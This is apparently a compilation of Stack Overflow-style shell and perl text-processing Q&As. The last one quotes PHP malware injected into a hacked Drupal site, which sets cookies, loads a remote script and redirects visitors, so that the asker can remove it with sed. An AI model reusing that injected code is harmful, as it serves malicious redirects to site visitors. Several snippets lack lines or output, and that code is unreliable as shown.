Finding multiple strings on multiple lines in file and manipulating output with bash/perl - perl

I am trying to get the version numbers for content management systems being hosted on my server. I can do this fairly simply if the version number is stored on one line with something like this:
grep -r "\$wp_version = '" /home/
Which returns exactly what I want to stdout:
/home/$RANDOMDOMAIN/wp-includes/version.php:$wp_version = '3.7.1';
The issue I run into is when I start looking for version numbers that are stored on two or more lines, like Joomla! or Magento which use the following formats respectively:
/** #var string Release version. */
public $RELEASE = '3.2';
/** #var string Maintenance version. */
public $DEV_LEVEL = '3';
'major' => '1',
'minor' => '8',
'revision' => '1',
'patch' => '0',
I have gotten it to 'work', in a way, using the following (With this method if, for whatever reason, one of the strings I am looking for is missing the whole command becomes useless since xargs -l3 is expecting 2 rows above the path provided by -print):
find /home/ -type f -name version.php -exec grep " \$RELEASE " '{}' \; -exec grep " \$DEV_LEVEL " '{}' \; -print | xargs -l3 | sed 's/\<var\>\s//g;s/\<public\>\s//g' | awk -F\; '{print $3":"$1""$2}' | sed 's/ $DEV_LEVEL = /./g'
Which get's me output like this:
/home/$RANDOMDOMAIN/version.php:$RELEASE = 3.2.3
/home/$RANDOMDOMAIN/anotherfolder/version.php:$RELEASE = 1.5.0
I also have a working for loop that WILL exclude any file that does not contain both strings, but depending how much it has to sift through, can take significantly longer than the find one liner above:
for path in $(grep -rl " \$RELEASE " /home/ 2> /dev/null | xargs grep -rl " \$DEV_LEVEL ")
joomlaver+=$(grep " \$RELEASE " $path)
joomlaver+=$(echo " \$DEV_LEVEL = '$(grep " \$DEV_LEVEL " $path | cut -d\' -f2)';")
echo "$joomlaver" | sed 's/\<var\>\s//g;s/\<public\>\s//g;s/;//g' | awk -F\' '{ print $1""$2"."$4 }' | sed 's/\s\+//g'
unset joomlaver
Which get's me output like this:
But I have to believe there is a simpler, shorter, more elegant way. Bash is preferred or if it can somehow be done with a perl one liner, that would work as well. Any and all help would be much appreciated. Thanks in advance. (Sorry for all the edits, but I am trying to figure this out myself as well!)

Here is a perl one-liner that will extract the $RELEASE and $DEV_LEVEL from the php file format you showed:
perl -ne '$v=$1 if /\$RELEASE\s*=\s*\047([0-9.]+)\047/; $devlevel=$1 if /\$DEV_LEVEL\s*=\s*\047([0-9.]+)\047/; if (defined $v && defined $devlevel) { print "$ARGV: Release=$v Devlevel=$devlevel\n"; last; }'
The -n makes perl effectivly wrap the whole thing inside a while (<>) { } loop. Each line is checked against two regexes. If both of them have matched then it will print the result and exit.
The \047 is used to match single quotes, otherwise the shell would get confused.
If it does not find a match, it does not print anything. Otherwise it prints something like this:
sample.php: Release=3.2 Devlevel=3
You would use it in combination with find and xargs to traverse down a directory structure, perhaps like this:
find . -name "*.php" | xargs perl -ne '$v=$1 if /\$RELEASE\s*=\s*\047([0-9.]+)\047/; $devlevel=$1 if /\$DEV_LEVEL\s*=\s*\047([0-9.]+)\047/; if (defined $v && defined $devlevel) { print "$ARGV: Release=$v Devlevel=$devlevel\n"; last; }'
You could make a similar version for the other file format (Magento?) you mentioned.


Replace a date string in sed with the ouput of a custom function with arguments

I have a bash script which echos out an html file like
this ./ > out.html In the html there are timestamps in the
following format 2019-02-24T17:02:19Z.
I wrote a function to
convert the time stamp to the time delta between the timestamp
and now.
START=$(date -d "$1" "+%s")
NOW=$(date "+%s")
STD=$(echo "($NOW-$START)/3600" | bc)
MIN=$(echo "(($NOW-$START)/60)%60" | bc)
echo "Uptime $STD h $MIN min"
Now I want to replace the timestamp with the output of my_uptime
directly in the stream. I tried this:
echo "<p>some html</p>
<p>some more html</p>" | sed -r "s/[0-9\-]+T[0-9:]+Z/$(my_uptime \0)/"
This fails because the command substitution doesn't recognize the
back reference and puts in a literal 0. Is there another way to
achieve this? Preferably directly in the stream.
... | sed -r "s/[0-9\-]+T[0-9:]+Z/$(my_uptime \0)/"
This code is attempting to pass the matched value from sed's s/// into the shell function. However, $(...) is expanded before sed even sees it.
Using sed is probably not appropriate here.
Here's a perl replacement that effectively combines your shell function and sed:
... | perl -ple '
if (/([0-9-]+T[0-9:]+Z)/) {
$s = `date -d "$1" +%s`;
$n = time;
$h = int(($n-$s)/3600);
$m = int(($n-$s)/60)%60;
$_ = "Uptime $h h $m min";
You could probably do something similar in awk.

Make some replacements on a bunch of files depending the number of columns per line

I'm having a problem dealing with some files. I need to perform a column count for every line in a file and depending the number of columns i need to add severals ',' in in the end of each line. All lines should have 36 columns separated by ','
This line solves my problem, but how do I run it in a folder with several files in a automated way?
awk ' BEGIN { FS = "," } ;
{if (NF == 32) { print $0",,,," } else if (NF==31) { print $0",,,,," }
Thank you for all your support
The answer depends on your OS, which you haven't told us. On UNIX and assuming you want to modify each original file, it'd be:
for file in *
awk '...' "$file" > tmp$$ && mv tmp$$ "$file"
Also, in general to get all records in a file to have the same number of fields you can do this without needing to specify what that number of fields is (though you can if appropriate):
$ cat tst.awk
NR==FNR { nf = (NF > nf ? NF : nf); next }
tail = sprintf("%*s",nf-NF,"")
gsub(/ /,OFS,tail)
print $0 tail
$ cat file
$ awk -f tst.awk file
$ awk -v nf=10 -f tst.awk file
It's a short one-liner with Perl:
perl -i.bak -F, -alpe '$_ .= "," x (36-#F)' *
if this is only a single folder without subfolders, use:
for oldfile in /path/to/files/*
awk '...' "${oldfile}" > "${newfile}"
if you also want to include subdirectories recursively, it's probably easiest to put the awk+redirection into a small shell-script, like this:
awk '...' "${oldfile}" > "${newfile}"
and then run this script (let's calls it via find:
find /path/to/files/ -type f -not -name "*.new" -exec \{\} \;

Using the bash sort command within variable-length filenames

I am trying to numerically sort a series of files output by the ls command which match the pattern either ABCDE1234A1789.RST.txt or ABCDE12345A1789.RST.txt by the '789' field.
In the example patterns above, ABCDE is the same for all files, 1234 or 12345 are digits that vary but are always either 4 or 5 digits in length. A1 is the same length for all files, but value can vary so unfortunately it can't be used as a delimiter. Everything after the first . is the same for all files. Something like:
ls -l *.RST.txt | sort -k +9.13 | awk '{print $9} ' > file-list.txt
will match the shorter filenames but not the longer ones because of the variable length of characters before the field I want to sort by.
Is there a way to accomplish sorting all files without first padding the shorter-length files to make them all the same length?
Perl to the rescue!
perl -e 'print "$_\n" for sort { substr($a, -11, 3) cmp substr($b, -11, 3) } glob "*.RST.txt"'
If your perl is more recent (5.10 or newer), you can shorten it to
perl -E 'say for sort { substr($a, -11, 3) cmp substr($b, -11, 3) } glob "*.RST.txt"'
Because of the parts of the filename which you've identified as unchanging, you can actually build a key which sort will use:
$ echo ABCDE{99999,8765,9876,345,654,23,21,2,3}A1789.RST.txt \
| fmt -w1 \
| sort -tE -k2,2n --debug
What this does is tell sort to separate the fields on character E, then use the 2nd field numerically. --debug arrived in coreutils 8.6, and can be very helpful in seeing exactly what sort is doing.
The conventional way to do this in bash is to extract your sort field. Except for the sort command, the following is implemented in pure bash alone:
sort_names_by_first_num() {
shopt -s extglob
for f; do
[[ $first_num ]] && printf '%s\t%s\n' "$first_num" "$f"
done | sort -n | while IFS='' read -r name; do name=${name#*$'\t'}; printf '%s\n' "$name"; done
sort_names_by_first_num *.RST.txt
That said, newline-delimiting filenames (as this question seems to call for) is a bad practice: Filenames on UNIX filesystems are allowed to contain newlines within their names, so separating them by newlines within a list means your list is unable to contain a substantial subset of the range of valid names. It's much better practice to NUL-delimit your lists. Doing that would look like so:
sort_names_by_first_num() {
shopt -s extglob
for f; do
[[ $first_num ]] && printf '%s\t%s\0' "$first_num" "$f"
done | sort -n -z | while IFS='' read -r -d '' name; do name=${name#*$'\t'}; printf '%s\0' "$name"; done
sort_names_by_first_num *.RST.txt

Any way to find if two adjacent new lines start with certain words?

Say I have a file like so:
I only want to find and count the amount of times during this file a line that starts with - is immediately followed by a line that starts with +.
No external scripts
Must be done from within a bash script
Must be inline
I could figure out how to do this in a Python script, for instance, but I've never had to do something this extensive in Bash.
Could anyone help me out? I figure it'll end up being grep, perl, or maybe a talented sed line -- but these are things I'm still learning.
Thank you all!
grep -A1 "^-" $file | grep "^+" | wc -l
The first grep finds all of the lines starting with -, and the -A1 causes it to also output the line after the match too.
We then grep that output for any lines starting with +. Logically:
We know the output of the first grep is only the -XXX lines and the following lines
We know that a +xxx line cannot also be a -xxx line
Therefore, any +xxx lines must be following lines, and should be counted, which we do with wc -l
Easy in Perl:
perl -lne '$c++ if $p and /^\+/; $p = /^-/ }{ print $c' FILE
awk one-liner:
awk -v FS='' '{x=x sprintf("%s", $1)}END{print gsub(/-\+/,"",x)}' file
kent$ cat file
kent$ awk -v FS='' '{x=x sprintf("%s", $1)}END{print gsub(/-\+/,"",x)}' file
Another Perl example. Not as terse as choroba's, but more transparent in how it works:
perl -e'while (<>) { $last = $cur; $cur = $_; print $last, $cur if substr($last, 0, 1) eq "-" && substr($cur, 0, 1) eq "+" }' < infile
Pure bash:
unset c p
while read line ; do
[[ $line == +* && $p == 0 ]] && (( c++ ))
[[ $line == -* ]]
done < FILE
echo $c

sed, replace first line

I got hacked by running a really outdated Drupal installation (shame on me)
It seems they injected the following in every .php file;
<?php global $sessdt_o; if(!$sessdt_o) {
$sessdt_o = 1; $sessdt_k = "lb11";
if(!#$_COOKIE[$sessdt_k]) {
$sessdt_f = "102";
if(!#headers_sent()) { #setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
else {
if($_COOKIE[$sessdt_k]=="102") {
$sessdt_f = (rand(1000,9000)+1);
if(!#headers_sent()) {
#setcookie($sessdt_k,$sessdt_f); }
else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; }
$sessdt_v = urlencode(strrev($sessdt_j));
$sessdt_u = "".$sessdt_f.substr($sessdt_v,-200);
echo "<script src='$sessdt_u'></script>";
echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--";
$sessdt_p = "showimg";
Can I remove and replace this with sed? e.g.:
find . -name *.php | xargs ...
I hope to have the site working just for the time being to use wget and made a static copy.
You can use sed with something like
sed '1 s/^.*$/<?php/'
The 1 part only replaces the first line. Then, thanks to the s command, it replaces the whole line by <?php.
To modify your files in-place, use the -i option of GNU sed.
To replace the first line of a file, you can use the c (for "change") command of sed:
sed '1c<?php'
which translates to: "on line 1, replace the pattern space with <?php".
For this particular problem, however, something like this would probably work:
sed '1,/^$/c<?php'
which reads: change the range "line 1 to the first empty line" to <?php, thus replacing all injected code.
(The second part of the address (the regular expression /^$/) should be replaced with an expression that would actually delimit the injected code, if it is not an empty line.)
# replace only first line
printf 'a\na\na\n' | sed '1 s/a/b/'
printf 'a\na\na\n' | perl -pe '$. <= 1 && s/a/b/'
perl is needed for more complex regex,
for example regex lookaround (lookahead, lookbehind)
sample use:
patch shebang lines in script files to use /usr/bin/env
shebang line is the first line: #!/bin/bash etc
find . -type f -exec perl -p -i -e \
'$. <= 1 && s,^#!\s*(/usr)?/bin/(?!env)(.+)$,#!/usr/bin/env \2,' '{}' \;
this will replace #! /usr/bin/python3 with #!/usr/bin/env python3
to make the script more portable (nixos linux, ...)
the (?!env) (negative lookahead) prevents double-replacing
its not perfect, since #!/bin/env foo is not replaced with #!/usr/bin/env foo ...